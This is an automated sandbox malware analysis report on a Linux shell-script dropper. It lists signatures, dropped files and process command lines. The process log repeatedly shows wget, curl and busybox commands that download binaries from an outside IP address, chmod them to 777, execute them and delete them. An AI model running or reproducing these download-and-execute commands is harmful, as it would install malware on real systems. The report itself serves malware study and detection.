Malware Analysis Report

2025-05-06 04:16

Sample ID 241025-btxqcs1cmr
Target 3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
SHA256 3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01

Threat Level: Shows suspicious behavior

The file 3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

Executes dropped EXE

File and Directory Permissions Modification

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 01:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 01:26

Reported

2024-10-25 01:29

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

18s

Max time network

132s

Command Line

[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A

Processes

/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh

[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/wget

[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

